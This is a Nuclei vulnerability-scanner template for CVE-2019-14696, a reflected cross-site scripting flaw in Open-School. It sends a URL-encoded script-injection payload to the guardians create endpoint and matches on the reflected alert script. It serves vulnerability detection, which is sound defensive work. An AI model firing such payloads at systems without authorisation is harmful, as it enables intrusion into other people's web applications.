nuclei-templates/cves/CVE-2019-14696.yaml

25 lines
603 B
YAML

id: cve-2019-14696
info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
author: pikpikcu
severity: medium
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-14696
# Vendor Homepage: [https://open-school.org/]
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.domain)</script>'
part: body